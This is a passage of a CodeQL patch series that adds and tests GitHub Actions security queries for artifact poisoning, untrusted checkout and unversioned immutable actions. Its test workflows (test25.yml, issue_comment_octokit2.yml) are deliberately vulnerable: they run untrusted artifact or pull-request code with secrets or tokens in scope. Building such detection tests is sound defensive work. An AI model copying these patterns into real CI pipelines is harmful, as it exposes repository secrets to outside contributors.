not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:25:13:25:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1ed39f73a485..6b2735181674 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -101,10 +101,14 @@ edges | .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | -| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | | .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities | | .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step | @@ -310,6 +314,7 @@ edges | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | From ae6309daf6245078e328425a241ee34e7f9be250 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:02:58 +0200 Subject: [PATCH 621/707] Account for tar -C option to specify path --- .../security/ArtifactPoisoningQuery.qll | 14 +++---- .../CWE-829/.github/workflows/test25.yml | 42 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 ++ .../UntrustedCheckoutCritical.expected | 3 ++ 5 files changed, 59 insertions(+), 7 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 48bca0e46f95..56f363164872 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -4,9 +4,9 @@ import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps -string unzipRegexp() { result = ".*(unzip|tar)\\s+.*" } +string unzipRegexp() { result = "(unzip|tar)\\s+.*" } -string unzipDirArgRegexp() { result = "-d\\s+([^ ]+).*" } +string unzipDirArgRegexp() { result = "(-d|-C)\\s+([^ ]+).*" } abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); @@ -166,7 +166,7 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" @@ -197,13 +197,13 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { result = normalizePath(trimQuotes(this.getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or @@ -243,13 +243,13 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { result = normalizePath(trimQuotes(this.getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else result = "GITHUB_WORKSPACE/" } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml new file mode 100644 index 000000000000..c825cc73813b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml @@ -0,0 +1,42 @@ +on: + workflow_run: + workflows: [ "build" ] + types: [ completed ] + +defaults: + run: + shell: bash + +jobs: + publish-build-scans: + name: Build scan publish + if: github.repository == 'test/test' && github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion != 'cancelled' + runs-on: ubuntu-latest + steps: + # Checkout target branch which has trusted code + - name: Check out target branch + uses: actions/checkout@v4 + with: + persist-credentials: false + ref: ${{ github.ref }} + - name: Download build scan + id: downloadBuildScan + uses: actions/download-artifact@v4 + with: + name: build-scan + github-token: ${{ github.token }} + repository: ${{ github.repository }} + run-id: ${{ github.event.workflow_run.id }} + # Don't fail a build if the file doesn't exist + continue-on-error: true + - name: Extract previously uploaded build scan content + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + run: tar -xzf build-scan.tgz -C ~ + - name: Publish + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + # Don't fail a build if publishing fails + continue-on-error: true + run: | + ./gradlew buildScanPublishPrevious + env: + ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 53b14ee7b50e..fd3c1fbc195f 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -15,6 +15,7 @@ edges | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -47,6 +48,8 @@ nodes | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -65,3 +68,4 @@ subpaths | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 49cee7772c0a..09aed9e34a10 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -15,6 +15,7 @@ edges | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -47,5 +48,7 @@ nodes | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 6b2735181674..3b2e5eb9de81 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -276,6 +276,9 @@ edges | .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | | .github/workflows/test24.yml:7:9:10:6 | Uses Step | .github/workflows/test24.yml:10:9:16:6 | Run Step | | .github/workflows/test24.yml:10:9:16:6 | Run Step | .github/workflows/test24.yml:16:9:20:57 | Run Step | +| .github/workflows/test25.yml:17:9:22:6 | Uses Step | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:32:9:35:6 | Run Step | +| .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From b6a26e76d4c3bece2bcee0d58c8b69cc0390be7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:03:11 +0200 Subject: [PATCH 622/707] New azure models --- ql/lib/ext/manual/azure_cli.model.yml | 7 +++++++ ql/lib/ext/manual/azure_powershell.model.yml | 1 + 2 files changed, 8 insertions(+) create mode 100644 ql/lib/ext/manual/azure_cli.model.yml diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/ql/lib/ext/manual/azure_cli.model.yml new file mode 100644 index 000000000000..dcf1de044aaf --- /dev/null +++ b/ql/lib/ext/manual/azure_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"] + - ["azure/cli", "*", "input.azcliversion", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml index e050b61815e5..a2d08f93928a 100644 --- a/ql/lib/ext/manual/azure_powershell.model.yml +++ b/ql/lib/ext/manual/azure_powershell.model.yml @@ -3,4 +3,5 @@ extensions: pack: github/actions-all extensible: actionsSinkModel data: + - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"] - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] From dbcf113546430d68a479f0766124576f46e024a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:04:01 +0200 Subject: [PATCH 623/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1af220ff8fb7..a818ba5362aa 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.75 +version: 0.1.76 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e8098e4f2156..fe6bdb0d77e9 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.75 +version: 0.1.76 groups: [actions, queries] suites: codeql-suites extractor: javascript From c9b1cd2c02ff6b6cebec5c8c34e296a10e768eb9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:16:43 -0400 Subject: [PATCH 624/707] add workflow to catch some ineligible wildcards and eligible latest version for immutable actions --- .../UseOfUnversionedImmutableAction.qll | 15 ++++++-- .../workflows/issue_comment_octokit2.yml | 38 +++++++++++++++++++ .../UnversionedImmutableAction.expected | 3 ++ 3 files changed, 53 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 3f65a2ffc72c..2fd47e3f8e19 100644 --- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -6,11 +6,20 @@ class UnversionedImmutableAction extends UsesStep { UnversionedImmutableAction() { immutableActionsDataModel(immutable_action) and this.getCallee() = immutable_action and - isNotSemVer(this.getVersion()) + not isSemVer(this.getVersion()) } } bindingset[version] -predicate isNotSemVer(string version) { - not version.regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") +predicate isSemVer(string version) { + // https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string with optional v prefix + version.regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") + + // or N or N.x or N.N.x with optional v prefix + or version.regexpMatch("^v?[1-9]\\d*$") + or version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") + or version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") + + // or latest which will work + or version = "latest" } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml new file mode 100644 index 000000000000..84081fef5d06 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -0,0 +1,38 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR minor and patch wildcard + uses: octokit/request-action@v2.x.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor patch wildcard + - uses: actions/checkout@v2.x.xx + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor wildcard incomplete patch + uses: actions/checkout@v2.x. + - name: Run latest action + uses: some-action/some-repo@latest + with: + some-input: some-value + - name: run the latest checkout action + uses: actions/checkout@latest \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index 5ae46862fb43..3aa7d6d654ec 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected @@ -4,6 +4,9 @@ | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | | .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | From 1c6d346f5343b115ec70c40e0852c70be052c52b Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:24:12 -0400 Subject: [PATCH 625/707] change ql message --- .../CWE-829/UnversionedImmutableAction.ql | 2 +- .../UnversionedImmutableAction.expected | 44 +++++++++---------- 2 files changed, 23 insertions(+), 23 deletions(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql index 0c6443bc3e64..0bc571ad4734 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -15,5 +15,5 @@ import codeql.actions.security.UseOfUnversionedImmutableAction from UnversionedImmutableAction step select step, - "The workflow is using an immutable action ($@) without versinoning so it doesn't work", step, + "The workflow is using an eligible immutable action ($@) without semantic versioning", step, step.getCallee() \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index 3aa7d6d654ec..df23709b5422 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected @@ -1,22 +1,22 @@ -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | -| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses 